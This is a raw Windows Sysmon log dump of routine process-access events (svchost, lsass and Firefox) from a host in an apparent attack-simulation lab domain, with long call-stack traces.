14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000018825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:57.523{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\SiteSecurityServiceState.txt2021-01-18 14:04:57.523 10341000x800000000000000018865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.351{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program 
Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.335{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.335{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.319{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla 
Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.319{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.298{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18 10341000x800000000000000018859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.273{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla 
